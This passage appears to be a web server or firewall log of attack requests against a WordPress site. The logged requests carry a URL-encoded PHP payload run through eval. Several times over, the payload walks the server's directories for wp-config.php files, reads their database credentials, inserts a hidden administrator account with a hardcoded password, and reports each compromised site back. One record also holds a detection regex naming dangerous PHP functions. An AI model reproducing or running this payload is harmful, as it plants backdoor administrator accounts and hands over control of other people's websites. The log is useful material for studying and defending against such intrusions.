4pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php HTTP\/1.1\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-type:application\/x-www-form-urlencoded\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\nhost:dewenlabels.com\n\nurOhQZ=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 18:10:28","213.209.159.254","POST","\/wp-admin\/includes\/theme.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Iz:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%